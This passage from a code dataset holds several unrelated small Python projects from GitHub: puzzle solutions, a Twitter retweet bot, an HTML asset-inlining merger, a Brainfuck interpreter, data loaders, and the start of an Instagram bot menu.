abs(nx - left[1])\n distance_from_right = abs(ny - right[0]) + abs(nx - right[1])\n if distance_from_left < distance_from_right:\n answer.append(\"L\")\n left = (ny, nx)\n elif distance_from_left > distance_from_right:\n answer.append(\"R\")\n right = (ny, nx)\n else:\n if hand == \"left\":\n answer.append(\"L\")\n left = (ny, nx)\n else:\n answer.append(\"R\")\n right = (ny, nx)\n return \"\".join(answer)\n\n\nif __name__ == \"__main__\":\n numbers = [1, 3, 4, 5, 8, 2, 1, 4, 5, 9, 5]\n hand = \"right\"\n print(solution(numbers, hand))\n","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"programmers/lv1/numberpad.py","file_name":"numberpad.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26722561640","text":"import datetime\nimport os\nimport time\nfrom os import environ\n\nimport tweepy\n\ntoday_date = datetime.date.today()\nsince_date = today_date - datetime.timedelta(days=1)\n\napi_key = environ[\"api_key\"]\napi_secret = environ[\"api_secret\"]\n\na_token = environ[\"a_token\"]\na_t_secret = environ[\"a_t_secret\"]\n\nauth = tweepy.OAuthHandler(api_key, api_secret)\nauth.set_access_token(a_token, a_t_secret)\n\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\nq = \"FAIRdata\" or \"datamanagement\" or \"datagovernance\" or \"datascience\"\n\nnrTweets = 20\n\nuser = api.me()\n\nfor tweet in tweepy.Cursor(api.search, q=q, since=since_date).items(nrTweets):\n try:\n tweet.retweet()\n 
time.sleep(300)\n except tweepy.TweepError as e:\n print(e.reason)\n except StopIteration:\n break\n","repo_name":"aswinsn/data_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74721835772","text":"import numpy as np\n\n\ndef relative_average_coordinate(heatmap, axis, weight_exponent=4):\n if isinstance(axis, tuple):\n return tuple(\n relative_average_coordinate(heatmap, axis=a, weight_exponent=weight_exponent)\n for a in axis\n )\n other = tuple(i for i in range(len(heatmap.shape)) if i != axis)\n weights = heatmap.sum(axis=other) ** weight_exponent\n value, step = np.linspace(0, 1, weights.shape[0], endpoint=False, retstep=True)\n value += step / 2\n return (value * weights).sum() / weights.sum()\n\n\ndef accumulate(accumulated, current, accumulated_weight=1):\n if accumulated is None:\n return current\n return (accumulated * accumulated_weight + current) / (accumulated_weight + 1)\n","repo_name":"bm371613/gest","sub_path":"gest/math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"78"} +{"seq_id":"36770956979","text":"def translate(text: str) -> str:\n result=''\n vowels=\"aeiouy\"\n while (text!=\"\"):\n result+=text[0]\n if text[0] in vowels:\n text=text[3:]\n elif text[0]==\" \":\n text=text[1:]\n else:\n text=text[2:]\n return result\n\n\nprint(\"Example:\")\nprint(translate(\"hieeelalaooo\"))","repo_name":"MiracleX77/CheckIO","sub_path":"Scientific Expedition/Bird Language.py","file_name":"Bird Language.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"559871814","text":"from os_engine_helper import OSEngineHelper\nfrom ceda_markup.opensearch.query import create_query\nfrom ceda_markup.opensearch.os_request import create_osdescription\nfrom xml.etree.ElementTree import tostring\nfrom xml.dom import minidom\n\n \n\nclass OSEngine(object):\n \"\"\"\n - :ref:`OSQuery <ceda_markup.opensearch.osquery.OSQuery>` **os_query**\n an OSQuery instance\n - :ref:`OSEngineResponse <ceda_markup.opensearch.template.osresponse.OSEngineResponse>` **os_responses**\n a list of OSEngineResponse instances\n - :ref:`OpenSearchDescription <ceda_markup.opensearch.os_response.OpenSearchDescription>` **os_description**\n an OpenSearchDescription instance \n - string **ospath**\n the URL where the OpenSearch service is hosted\n - :ref:`OSEngineHelper <ceda_markup.opensearch.os_engine_helper.OSEngineHelper>` **os_engine_helper**\n to write\n \"\"\"\n\n def __init__(self, os_query, os_responses, os_description, os_engine_helper = None):\n\n self.os_query = os_query\n self.os_responses = os_responses\n self.os_description = os_description \n self.os_engine_helper = os_engine_helper\n if os_engine_helper is None:\n self.os_engine_helper = OSEngineHelper()\n self.os_host_url = 'http://localhost' \n \n def do_search(self, host_url, mimetype, context):\n \"\"\"\n Executes the Opensearch call.\n Returns a response in the required mimetype or None if the mimetype is not supported \n \n - string **os_host_url** \n the opensearch engine URL\n - string **mimetype** \n the desired mimetype output\n - dict **context** \n a dictionary containing all the necessary information to exploit the request \n \"\"\"\n self.os_host_url = host_url\n response = None\n for item 
in self.os_responses:\n if item.extension == mimetype:\n response = item\n if response is not None:\n query = create_query(mimetype, self.os_query.params_model, context)\n result = self.os_query.do_search(query, context)\n packaged_results = response.digest_search_results(result, context)\n return response.generate_response(packaged_results, query, \\\n self.os_host_url, \\\n self.os_query.params_model, \\\n context)\n return None \n \n def get_description(self, ospath):\n \"\"\"\n Returns a string representation of the `OpenSearchDescription <http://www.opensearch.org/Specifications/OpenSearch/1.1#OpenSearch_description_document>`_ element\n \n - string ospath\n The engine host URL\n \"\"\"\n req_doc = create_osdescription(self.os_responses, self.os_description, self.os_query, ospath)\n self.os_engine_helper.additional_description(req_doc)\n reparsed = minidom.parseString(tostring(req_doc))\n return reparsed.toprettyxml(indent=\" \")\n\n def create_query_dictionary(self):\n ''' \n Returns a dictionary having as keys the query parameters. This method is \n supposed to be used as utility to migrate the request parameters from the \n http request to an internal neutral (not any django QueryDict) dictionary.\n ''' \n ret = {}\n for param in self.os_query.params_model:\n ret[param.par_name] = None\n return ret \n","repo_name":"kusamau/cedaMarkup","sub_path":"ceda_markup/opensearch/os_engine.py","file_name":"os_engine.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18431295564","text":"import pandas as pd\nimport pathlib\n\nDATA_DIR = pathlib.Path(__file__).parent.parent.joinpath(\"data\", \"raw\")\n\nPARCEL_DATE_COLS = ((\"DateToOwner\", r\"%m/%d/%Y\"), (\"AppraisalDate\", r\"%Y-%m-%d\"))\n\nPARCEL_FILE_COLS = [\n (25, 0, \"ParcelNum\", str),\n (25, 1, \"LocalParcelNum\", str),\n (4, 2, \"TownshipNum\", int),\n (3, 3, \"LocalTaxDistrictNum\", str),\n (3, 4, \"StateTaxDistrictNum\", int),\n (8, 5, \"SectionPlat\", str),\n (25, 6, \"RoutingNum\", str),\n (60, 7, \"PropAddress\", str),\n (30, 8, \"PropCity\", str),\n (10, 9, \"PropZIP\", str),\n (3, 10, \"PropClass\", str),\n (12, 11, \"NeighID\", str),\n (5, 12, \"NeighFactor\", float),\n (5, 13, \"AdjFactorLand\", float),\n (5, 14, \"AdjFactorImprovements\", float),\n (80, 15, \"Owner\", str),\n (60, 16, \"OwnerAddress\", str),\n (30, 17, \"OwnerCity\", str),\n (30, 18, \"OwnerState\", str),\n (10, 19, \"OwnerPostal\", str),\n (3, 20, \"OwnerCountry\", str),\n (10, 21, \"DateToOwner\", None),\n (1, 22, \"Level\", str),\n (1, 23, \"High\", str),\n (1, 24, \"Low\", str),\n (1, 25, \"Rolling\", str),\n (1, 26, \"Swampy\", str),\n (1, 27, \"Water\", str),\n (1, 28, \"Sewer\", str),\n (1, 29, \"Gas\", str),\n (1, 30, \"Electricity\", str),\n (1, 31, \"StreetCode\", str),\n (1, 32, \"Sidewalk\", str),\n (1, 33, \"Alley\", str),\n (1, 34, \"NeighType\", str),\n (3, 35, \"WaterPropType\", str),\n (5, 36, \"Zoning\", str),\n (1, 37, \"FloodHazard\", str),\n (12, 38, \"ValueLand\", float),\n (12, 39, \"ValueImprove\", float),\n (12, 40, \"ValueTotal\", float),\n (12, 41, \"AdjustmentLand\", float),\n (12, 42, \"AdjustmentImprove\", float),\n (12, 43, \"AdjustmentFarm\", float),\n (12, 44, \"ValueLandBreaker\", float),\n (12, 45, \"ValueImproveBreaker\", float),\n (12, 46, \"ValueNonHomeLandBreaker\", float),\n (12, 47, \"ValueNonHomeImprBreaker\", float),\n (12, 48, \"ValueAptLand\", float),\n (12, 49, \"ValueAptImpr\", float),\n (12, 50, 
\"ValueCareLandBreaker\", float),\n (12, 51, \"ValueCareImproveBreaker\", float),\n (12, 52, \"ValueFarmBreaker\", float),\n (12, 53, \"ValueMobileBreaker\", float),\n (12, 54, \"Land3Breaker\", float),\n (12, 55, \"Improve3Breaker\", float),\n (12, 56, \"ClassifiedLand\", float),\n (12, 57, \"DeededAcreage\", float),\n (10, 58, \"AppraisalDate\", None),\n (2, 59, \"ReasonCodeChange\", str),\n (12, 60, \"PriorValueLand\", float),\n (12, 61, \"PriorImprove\", float),\n (5, 62, \"AdjustmentFactor\", float),\n (500, 63, \"LegalDescription\", str),\n (1, 64, \"Anonymous\", str),\n (12, 65, \"CurrentValueLand\", float),\n (12, 66, \"CurrentValueImprove\", float),\n (12, 67, \"CurrentValueTotal\", float),\n]\n\n\ndef load_parcel_file():\n \"\"\"Load parcel file\n\n Returns\n -------\n df : pd.DataFrame\n DataFrame containing data on parcels\n \"\"\"\n # real_fname = f\"RealParcel_{county}_18_2018P2019.txt\"\n\n fname_stem = f\"RealParcel_\"\n ext = \".txt\"\n\n dtypes = {x[2]: x[3] for x in PARCEL_FILE_COLS if x[3] is not None}\n date_cols = tuple(x[1] for x in PARCEL_FILE_COLS if x[3] is None)\n col_widths = list(x[0] for x in PARCEL_FILE_COLS)\n col_names = list(x[2] for x in PARCEL_FILE_COLS)\n\n df = pd.concat(\n [\n pd.read_fwf(\n DATA_DIR.joinpath(fname),\n widths=col_widths,\n names=col_names,\n skipfooter=1,\n dtypes=dtypes,\n # infer_date_cols=date_cols,\n skiprows=1,\n )\n for fname in DATA_DIR.glob(f\"{fname_stem}*{ext}\")\n ]\n )\n\n for col, fmt in PARCEL_DATE_COLS:\n df.loc[:, col] = pd.to_datetime(df.loc[:, col], format=fmt)\n return df\n\n\nif __name__ == \"__main__\":\n\n df = load_parcel_file()\n\n print(\" \")\n","repo_name":"ajkluber/Property-Analysis","sub_path":"src/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19703894275","text":"#!/usr/bin/env python3\n\"\"\"Element Tree for Hyper Text Legacy File Converter\"\"\" \n\nimport os.path\nimport lxml.etree\nimport io\nimport mimetypes\nimport base64\nimport html\nimport importlib.resources\n\nfrom htlfc.agents import codecs\n\nclass ET():\n \"\"\"Upon init, convert the primary HTML into an element tree (ET)\n and append to self.forest[]\n Subsequent calls are required as follows...\n find_iframes() append self.forest[]\n cascade() merge styles CSS inline - repeat until all done\n substitute() merge external files into the ET\n merge_iframes() merge external iframes into the ET\n Finally...\n write_file() write the ET back to a file\n \"\"\"\n def __init__(self, filepath):\n self.forest = list() # of (filepath,etree,encoding)\n self.parser = lxml.etree.HTMLParser()\n self.__new_tree(filepath)\n\n def __new_tree(self,filepath):\n \"\"\"Decode and parse html file. 
Append to self.forest\n filepath:str\n return@success etree\n \"\"\"\n try:\n content,encoding = codecs.get_text(filepath)\n except EOFError as err:\n raise RuntimeError(f\"File is empty: {filepath}\")\n else:\n etree = lxml.etree.parse(io.StringIO(content),self.parser)\n self.forest.append((filepath,etree,encoding))\n return etree\n\n def find_iframes(self,manifest):\n \"\"\"Search for frames in manifest\n store found frames in self.frames and self.forest\n \"\"\"\n # search for frames\n self.frames = dict()\n for datapath,filepath in manifest.items() :\n extension = os.path.splitext(filepath)[1].lower()\n if extension in ['.htm','.html','.shtml'] :\n self.frames.update({datapath:filepath})\n\n def _find_a_frame(etree,depth):\n \"\"\"Search for frames at this level, if found:\n - append to self.forest\n - invoke itself against the found frame\n \"\"\"\n tag = './/*iframe' # XPath for a tag\n for element in etree.findall(tag):\n path = element.get('src')\n if path is None: continue\n for datapath,filepath in self.frames.items():\n if path == datapath:\n for filepath1,_,_ in self.forest :\n if filepath == filepath1 : continue # duplicate\n new_etree = self.__new_tree(filepath)\n _find_a_frame(new_etree ,depth+1) # recurse\n return\n\n # add frames for primary etree and recurse for every file that is added\n _,primary,_ = self.forest[0]\n _find_a_frame(primary,0)\n\n def add_info_bar(self,metadata):\n \"\"\"Add an info bar across the top of page\n metadata:dict\n metadata['timestamp']:str\n metadata['url']:str\n \"\"\"\n head = self.forest[0][1].find(\"head\")\n if head is None: # add <head> element to root\n root = self.forest[0][1].getroot()\n head = lxml.etree.fromstring('<head/>')\n root.insert(0,head)\n with importlib.resources.open_text(\"htlfc.merger\", \"infobar.css\") as fp:\n info_css = lxml.etree.fromstring(fp.read())\n head.append(info_css)\n body = self.forest[0][1].find(\"body\")\n if body is not None:\n if 'url' in metadata:\n info_text = f\"[{metadata['url']}]\"\n else:\n info_text = \"\"\n if 'timestamp' in metadata:\n info_text += f\" {metadata['timestamp']}\"\n info_text = html.escape(info_text) # eg symbols like \"&\"\n info = lxml.etree.fromstring(f'<div class=\"info_bar\">{info_text}</div>')\n body.insert(0,info)\n\n def cascade(self,datapath,filepath):\n \"\"\"Look for included styles and replace with in-line text\n datapath:str = path to a style object as it appears within the HTML\n filepath:str = path to a style object in local storage\n return@success = count\n count:int = how many matches were found and replaced\n \"\"\"\n count = 0\n\n # looking for attribute href=\"datapath\" when used with stylesheet\n attribute = './/*[@href=\"{}\"]'.format(datapath) # XPath for an attribute\n for _,etree,_ in self.forest:\n for element in etree.findall(attribute):\n if filepath.lower().endswith('.css'):\n element.attrib.pop('href')\n element.tag = 'style' # may have been 'link'\n newtext = self.__file2text(filepath)\n element.text = newtext\n count += 1\n\n # looking for tag style with text \"import url()\"\n pattern = '@import url(\"{}\");'.format(datapath)\n tag = './/*style' # XPath for a tag\n for _,etree,_ in self.forest:\n for element in etree.findall(tag):\n if element.text is None : continue\n if element.text.find(pattern) > 0 :\n newtext = self.__file2text(filepath)\n element.text = element.text.replace(pattern,newtext)\n count += 1\n\n # looking for tag <style> with text url(\"itemname\")\n pattern = 'url(\"{}\")'.format(datapath)\n tag='.//*style' # XPath for a 
tag\n for _,etree,_ in self.forest:\n for element in etree.findall(tag):\n if element.text is None : continue\n if element.text.find(pattern) > 0 :\n newtext = 'url({})'.format(self.__file2text(filepath))\n element.text = element.text.replace(pattern,newtext)\n count += 1\n\n return count\n\n def substitute(self,datapath,filepath):\n \"\"\"Look for included objects and replace with uri\n datapath:str = path to an object as it appears within the HTML\n filepath:str = path to an object in local storage, to be converted to text\n return@success : warnings\n warnings:list of warning, if none then empty list\n warning:str = message due to failure to convert object at filepath\n \"\"\"\n warnings = list()\n patterns = ['url({})'.format(datapath)]\n patterns.append('url(\"{}\")'.format(datapath))\n\n for _,etree,_ in self.forest:\n for element in etree.iter():\n # looking for attribute src=\"datapath\"\n src = element.attrib.get('src')\n if src == datapath:\n # src=script becomes text of the element\n if element.tag == 'script':\n element.text = self.__file2uri(filepath)\n del element.attrib['src']\n elif element.tag == 'iframe':\n continue # defer until merge_iframes()\n else:\n element.attrib['src'] = self.__file2uri(filepath)\n\n # looking for attribute background=\"datapath\"\n src = element.attrib.get('background')\n if src == datapath:\n newtext = self.__file2uri(filepath)\n element.attrib['background'] = newtext\n\n # looking for url(datapath) in the attribute style\n if element.attrib.get('style'):\n for pattern in patterns:\n if pattern in element.attrib[\"style\"]:\n newtext = 'url({})'.format(self.__file2uri(filepath))\n element.attrib[\"style\"] = element.attrib[\"style\"].replace(pattern,newtext)\n \n # looking for url(\"datapath\") in any text\n if element.text is None : continue\n for pattern in patterns:\n if element.text.find(pattern) > 0 :\n newtext = 'url({})'.format(self.__file2uri(filepath))\n element.text = element.text.replace(pattern,newtext)\n\n return warnings\n\n def __file2uri(self,filepath):\n \"\"\"Helper function to convert a file at filepath\n into its text representation\n Exceptions are converted to RuntimeWarning\n \"\"\"\n if os.path.getsize(filepath) == 0:\n raise RuntimeWarning(f\"File is empty: {filepath}\")\n uri = ['data:']\n mimetype,_ = mimetypes.guess_type(filepath, strict = False)\n # when the extension is missing, mimetypes will fail\n if mimetype is None: mimetype = 'application/octet-stream'\n uri.append(mimetype)\n uri.append(\";base64,\")\n try:\n with open(filepath,'rb') as fp:\n data = fp.read()\n encoded = base64.b64encode(data)\n except Exception as err:\n raise RuntimeWarning(f\"b64encode error {err} | from: {filepath}\")\n else:\n uri.append(encoded.decode(\"utf-8\"))\n return ''.join(uri)\n\n def __file2text(self,filepath):\n \"\"\"Helper function to convert any document\n at filepath into text\n Exceptions are converted to RuntimeWarning\n \"\"\"\n if os.path.getsize(filepath) == 0:\n filename = os.path.basename(filepath)\n raise RuntimeWarning(f\"File is empty: {filename}\")\n text,_ = codecs.get_text(filepath)\n return text\n\n def merge_iframes(self):\n \"\"\"Reduce all etrees to one\"\"\"\n _,tree,encoding = self.forest[0] # primary etree\n tag = './/*iframe' # XPath for a tag\n\n # Looking for level 1 iframes...\n for element1 in tree.findall(tag):\n datapath1 = element1.get('src')\n if datapath1 is None: continue\n if datapath1 in self.frames:\n target1 = self.frames[datapath1]\n else: continue\n # ignore [0] because it is the 
primary etree...\n for filepath1,etree1,encoding1 in self.forest[1:]:\n if filepath1 == target1:\n\n # Looking for level 2 iframes...\n for element2 in etree1.findall(tag):\n datapath2 = element2.get('src')\n if datapath2 is None: continue\n if datapath2 in self.frames:\n target2 = self.frames[datapath2]\n else: continue\n for filepath2,etree2,encoding2 in self.forest[1:]:\n if filepath2 == target2:\n\n # Looking for level 3 iframes...\n for element3 in etree2.findall(tag):\n datapath3= element3.get('src')\n if datapath3 is None: continue\n if datapath3 in self.frames:\n target3 = self.frames[datapath3]\n else: continue\n for filepath3,etree3,encoding3 in self.forest[1:]:\n if filepath3 == target3:\n raise RuntimeError(\"Level three iframe was found but is not supported\")\n # Found level 2 iframe...\n if encoding2 is None:\n frame_text2 = lxml.etree.tostring(etree2\n ,method = 'html')\n frame_text2 = frame_text2.decode()\n else:\n frame_text2 = lxml.etree.tostring(etree2\n ,encoding = encoding2\n ,method = 'html')\n frame_text2 = frame_text2.decode(encoding2)\n # Merge into tree\n # replace src=\"..path..\"\n # with srcdoc='..inline..' (single quotes)\n del element2.attrib['src']\n element2.set('srcdoc',frame_text2)\n\n # Found level 1 iframe...\n if encoding1 is None:\n frame_text1 = lxml.etree.tostring(etree1\n ,method = 'html')\n frame_text1 = frame_text1.decode()\n else:\n frame_text1 = lxml.etree.tostring(etree1\n ,encoding = encoding1\n ,method = 'html')\n frame_text1 = frame_text1.decode(encoding1)\n # Merge into tree\n # replace src=\"..path..\"\n # with srcdoc=\"..inline..\" (double quotes)\n del element1.attrib['src']\n element1.set('srcdoc',frame_text1)\n\n def write_file(self,filepath):\n \"\"\"Serialize the Etree\n filepath:str = path to output file\n \"\"\"\n _,etree,encoding = self.forest[0]\n kwargs = { 'method':'html' } # args for tostring()\n if encoding is not None:\n kwargs['encoding'] = encoding\n result = lxml.etree.tostring(etree,**kwargs)\n with open(filepath,'wb') as fp:\n fp.write(result)\n\n","repo_name":"HairySpoon/htlfc","sub_path":"src/htlfc/merger/xmltree.py","file_name":"xmltree.py","file_ext":"py","file_size_in_byte":13380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3229131851","text":"CHARACTERS = [\"+\", \"-\", \"<\", \">\", \"[\", \"]\", \".\", \",\", \"*\"]\nDISPLAY = False\n\n\ndef display(memory, command=\"\"):\n if DISPLAY:\n for val in memory.tape:\n print(\"|\", val, \"|\", end=\"\")\n print()\n print(\" \" * memory.pointer + \" ^\")\n print(\" \" * memory.pointer + \" |\")\n print(\" \" * memory.pointer + \" \" + command)\n print()\n input()\n\n\nclass Memory:\n def __init__(self, tape=[0], pointer=0):\n self.tape = tape\n self.pointer = pointer\n self.input_buffer = []\n\n\nclass Compiler:\n def __init__(self, code, memory=Memory()):\n self.memory = memory\n self.code = code\n\n def run(self):\n while len(self.code) > 0:\n command = self.code[0]\n display(self.memory, command)\n self.code = self.code[1:]\n if command == CHARACTERS[0]:\n self.plus()\n elif command == CHARACTERS[1]:\n self.minus()\n elif command == CHARACTERS[2]:\n self.left()\n elif command == CHARACTERS[3]:\n self.right()\n elif command == CHARACTERS[4]:\n self.open()\n elif command == CHARACTERS[5]:\n self.close()\n elif command == CHARACTERS[6]:\n self.write()\n elif command == CHARACTERS[7]:\n self.read()\n elif command == CHARACTERS[8]:\n global DISPLAY\n DISPLAY = not DISPLAY\n else:\n raise 
NotImplementedError(command)\n return self.memory.tape, self.memory.pointer\n\n def plus(self):\n self.memory.tape[self.memory.pointer] += 1\n\n def minus(self):\n self.memory.tape[self.memory.pointer] -= 1\n\n def left(self):\n if self.memory.pointer >= 0:\n self.memory.pointer -= 1\n else:\n raise IndexError(\"pointer can not go below 0\")\n\n def right(self):\n if self.memory.pointer + 1 == len(self.memory.tape):\n self.memory.tape.append(0)\n self.memory.pointer += 1\n\n def open(self):\n depth = 0\n for i in range(len(self.code)):\n char = self.code[i]\n if char == CHARACTERS[4]:\n depth += 1\n elif char == CHARACTERS[5]:\n depth -= 1\n if depth == -1:\n while self.memory.tape[self.memory.pointer] is not 0:\n nested_code = Compiler(self.code[:i], self.memory)\n nested_code.run()\n self.code = self.code[i:]\n break\n else:\n raise RuntimeError(CHARACTERS[5] + \" not found for \" + CHARACTERS[4])\n\n def close(self):\n return\n # raise RuntimeError(CHARACTERS[4] + \" not found for \" + CHARACTERS[5])\n\n def write(self):\n val = self.memory.tape[self.memory.pointer]\n if val == 10:\n print()\n else:\n print(chr(val), end=\"\")\n\n def read(self):\n if len(self.memory.input_buffer) == 0:\n self.memory.input_buffer = [ord(character) for character in input()]\n self.memory.input_buffer.append(10)\n num = self.memory.input_buffer[0]\n self.memory.input_buffer = self.memory.input_buffer[1:]\n self.memory.tape[self.memory.pointer] = num\n\n\nif __name__ == \"__main__\":\n with open('brainF.txt', 'r') as file:\n raw = file.read()\n\n pure_code = ''.join([i for i in raw if i in CHARACTERS])\n\n print(pure_code)\n\n compiler = Compiler(pure_code)\n print(compiler.run())\n","repo_name":"cmcahoon01/C-Compiler","sub_path":"brainRunner.py","file_name":"brainRunner.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20908196586","text":"import inspect\nimport logging\nfrom dataclasses import dataclass\nfrom types import FrameType, TracebackType\nfrom typing import Dict, List, Optional, Type\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass ExceptionInfo:\n \"\"\"Corresponds to the return value from sys.exc_info().\"\"\"\n type_exception: Type[BaseException]\n exception: BaseException\n traceback: Optional[TracebackType]\n\n\n@dataclass\nclass TracebackFramesParsingResult:\n frames: List[FrameType]\n have_all_frames_been_parsed: bool\n\n\ndef exc_info_to_dict(exc_info: ExceptionInfo):\n \"\"\"\n Transform exc_info from sys.exc_info() to dict.\n :param exc_info: exc_info with type ExceptionInfo.\n :return:\n Dict{\n error: error class,\n error_message: message provided with error,\n traceback: list of frames in dict format\n * traceback_parsing_warning: shown if there is a warning about the huge amount of trace frames\n }\n * - optional output\n \"\"\"\n tb_frames_parsing_result = _get_traceback_frames(exc_info.traceback) if \\\n exc_info.traceback else TracebackFramesParsingResult(frames=[],\n have_all_frames_been_parsed=True)\n\n traceback = list(map(_frame_to_dict, tb_frames_parsing_result.frames))\n exc_info_dict = {\n 'error': exc_info.type_exception.__name__,\n 'error_message': str(exc_info.exception),\n 'traceback': traceback\n }\n if not tb_frames_parsing_result.have_all_frames_been_parsed:\n exc_info_dict |= {'traceback_parsing_warning': 'There are too many frames in the traceback object. '\n 'You only see the first ones available. 
'\n 'The rest are not displayed in the logs'}\n\n return exc_info_dict\n\n\ndef _get_traceback_frames(traceback: TracebackType, max_frames_amount=100) -> \\\n TracebackFramesParsingResult:\n \"\"\"\n Gets all frames from traceback.\n :param traceback: traceback with type TracebackType.\n :param max_frames_amount: max amount of frames in the traceback.\n :return: dataclass TracebackFramesParsingResult that includes list of frames and\n information about if all traceback frames have been parsed.\n \"\"\"\n frames: List[FrameType] = []\n while traceback is not None:\n frames.append(traceback.tb_frame)\n traceback = traceback.tb_next\n if len(frames) >= max_frames_amount:\n return TracebackFramesParsingResult(frames=frames,\n have_all_frames_been_parsed=False)\n return TracebackFramesParsingResult(frames=frames,\n have_all_frames_been_parsed=True)\n\n\ndef _frame_to_dict(frame: FrameType) -> Dict[str, str]:\n \"\"\"\n Transform frame with type FrameType to dict.\n P.S. Transfer from frame info only filename, lineno, function, code_context attributes!\n :param frame: frame with type FrameType\n :return:\n Dict{\n 'filename': corresponds to inspect.FrameInfo.filename,\n 'lineno': corresponds to inspect.FrameInfo.lineno,\n 'function': corresponds to inspect.FrameInfo.function,\n 'code_context': corresponds to inspect.FrameInfo.code_context\n }\n \"\"\"\n frame_info = inspect.getframeinfo(frame)\n return {\n 'filename': frame_info.filename,\n 'lineno': frame_info.lineno,\n 'function': frame_info.function,\n 'code_context': [ctx_line.strip().replace('\\n', '')\n for ctx_line in frame_info.code_context]\n }\n","repo_name":"mild-blue/txmatching","sub_path":"txmatching/web/web_utils/traceback_formatters.py","file_name":"traceback_formatters.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"13660432608","text":"#!/usr/bin/python3\n\ntests = int(input())\n\nfor i in range(tests):\n ln = int(input())\n res = []\n def backtrack(cur, left):\n if left == 0:\n res.append(cur)\n return\n for i in ['6','8']:\n backtrack(cur+ i,left-1)\n backtrack(\"\",ln)\n print(len(res))\n print(\" \".join(res))\n","repo_name":"ptit-mo/code","sub_path":"dsa/thilan1/so_loc_phat.py","file_name":"so_loc_phat.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6436908491","text":"import kaldi_io\nimport numpy as np\n\ndef read_all_data(feat_scp):\n feat_fid = open(feat_scp, 'r')\n feat = feat_fid.readlines()\n feat_fid.close()\n mat_list = []\n\n for i in range(len(feat)):\n _, ark = feat[i].split()\n mat = kaldi_io.read_mat(ark)\n mat_list.append(mat)\n return np.concatenate(mat_list, axis=0)\n\ndef read_feats_and_targets(feat_scp, text_file):\n feat_fid = open(feat_scp, 'r')\n text_fid = open(text_file, 'r')\n feat = feat_fid.readlines()\n text = text_fid.readlines()\n feat_fid.close()\n text_fid.close()\n assert(len(feat) == len(text))\n dict_utt2feat = {}\n dict_target2utt = {}\n for i in range(len(feat)):\n utt_id1, ark = feat[i].strip('\\n').split(' ')\n utt_id2, target = text[i].strip('\\n').split(' ')\n dict_utt2feat[utt_id1] = ark\n if target in dict_target2utt.keys():\n dict_target2utt[target].append(utt_id2)\n else:\n dict_target2utt[target] = [utt_id2]\n return dict_utt2feat, dict_target2utt\n\ndef get_feats(target, dic_utt2feat, dict_target2utt):\n \"\"\" Read feats for a specific target\n :param target: char, 
'0', '1', ..., '9', o'\n :param dict_utt2feat: utterance to feat dictionary\n :param dict_target2utt: target to utterance dictionary\n :return: feature matrix for this target, num_samples * feature dim\n \"\"\"\n mat_list = []\n for utt in dict_target2utt[target]:\n ark = dic_utt2feat[utt]\n mat = kaldi_io.read_mat(ark)\n mat_list.append(mat)\n return np.concatenate(mat_list, axis=0)\n\n","repo_name":"nwpuaslp/ASR_Course","sub_path":"03-GMM-EM/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"78"} +{"seq_id":"38880003189","text":"from Self_info import self_info\nfrom Get_own_post import get_own_post\nfrom Get_user_id import get_user_id\nfrom Get_user_info import get_user_info\nfrom Get_user_post_info import get_user_post_info\nfrom Like_a_post import like_a_post\nfrom Post_a_comment import post_a_comment\nfrom Recent_liked_pic import user_post_like_by_me\nfrom Get_all_posts_of_user import get_all_posts\nfrom Most_commented_own_post import most_commented_post\nfrom Most_liked_own_post import most_liked_post\nfrom Most_commented_user_post import most_commented_user_post\nfrom Most_liked_user_post import most_liked_user_post\nfrom Pie_chart import pie_chart\nfrom Caption import caption_comment\nfrom Friend_list import userName,friend_list\n\n\n\n\n\n#--------------------------------------------------MAIN FUNCTION---------------------------------------#\ndef main():\n var = True\n\n while var :\n print(\"---------------------------------------------------------------------------------------------------------\")\n print(\" What do you want to do ?.\\n 1.Self-information...\\n 2.Get own-post...\\n 3.Get user-id...\\n 4.Get user-info...\\n 5.Get user recent post-info...\\n 6.Like a user-post...\\n 7.Post a comment on user-id...\\n 8.Get the recent post liked by you of the other user...\\n 9.Download all posts of other user...\\n 10.Download the most commented own post...\\n 11.Download most liked own post...\\n 12.Download the most commented user's post...\\n 13.Download the most liked user's post...\\n 14.Draw a pie-chat of all -ve and +ve comments of own post...\\n 15.Targeted comments based on user's post caption...\\n 16.Exit...\"\n \"\")\n get = (raw_input(\"Please enter your choice : \"))\n while get.isdigit() is not True:\n get = (raw_input(\"Please enter your choice : \"))\n get = int(get)\n while get <=0 or get >=17 :\n get = (raw_input(\"Please again enter your choice : \"))\n if get.isdigit():\n get = int(get)\n else:\n get = (raw_input(\"Please again enter your choice : \"))\n\n\n print(\"\\n\")\n if get == 1 :\n # ----getting my own info----#\n self_info()\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 2 :\n # ----getting my recent post info & saving it as(lakshay.jpg)----#\n get_own_post()\n print(\"-----------------------------------------------------------------------------------------------------\")\n 